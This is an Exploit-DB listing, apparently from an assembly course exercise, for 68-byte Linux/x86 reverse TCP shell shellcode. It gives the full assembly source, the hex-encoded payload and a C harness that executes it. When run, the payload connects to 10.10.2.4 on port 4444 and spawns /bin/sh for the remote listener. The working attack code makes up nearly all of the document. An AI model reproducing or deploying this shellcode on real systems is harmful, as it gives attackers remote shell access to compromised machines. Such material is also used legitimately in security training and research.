Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)

EDB-ID:

44738

CVE:

N/A

EDB Verified:

Author:

Nuno Freitas

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86

Date:

2018-05-24

Vulnerable App: 
/*
; Title     : Linux/x86 - Reverse TCP Shell Shellcode (68 bytes)
; Date      : May, 2018
; Author    : Nuno Freitas
; Blog Post : https://bufferoverflowed.wordpress.com
; Twitter   : @nunof11
; SLAE ID   : SLAE-1112
; Size      : 68 bytes
; Tested on : i686 GNU/Linux

section .text

global _start

_start:
	xor ecx, ecx
	mul ecx

	mov al, 0x66
	push ebx
	inc ebx
	push ebx
	push 0x2
	mov ecx, esp
	int 0x80

	pop ecx
        xchg eax, ebx
loop:
	mov al, 0x3f
        int 0x80
        dec ecx
        jns loop

	mov al, 0x66
	dec ebx
	push 0x04020a0a	 ; IP
	push word 0x5c11 ; Port
	push bx
	mov ecx,esp
	push 0x10
	push ecx
	inc ebx
	push ebx
	mov ecx,esp
	int 0x80

	mov al, 0x0b
	xor ecx, ecx
	push ecx
	push dword 0x68732f2f
	push dword 0x6e69622f
	mov ebx, esp
	int 0x80

*/

#include <stdio.h>
#include <string.h>

unsigned char shellcode[] = \
"\x31\xc9\xf7\xe1\xb0\x66\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x59\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x4b\x68\x0a\x0a\x02\x04\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x43\x53\x89\xe1\xcd\x80\xb0\x0b\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

void main()
{
	printf("Shellcode Length:  %d\n", strlen(shellcode));

	int (*ret)() = (int(*)())shellcode;
	ret();
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services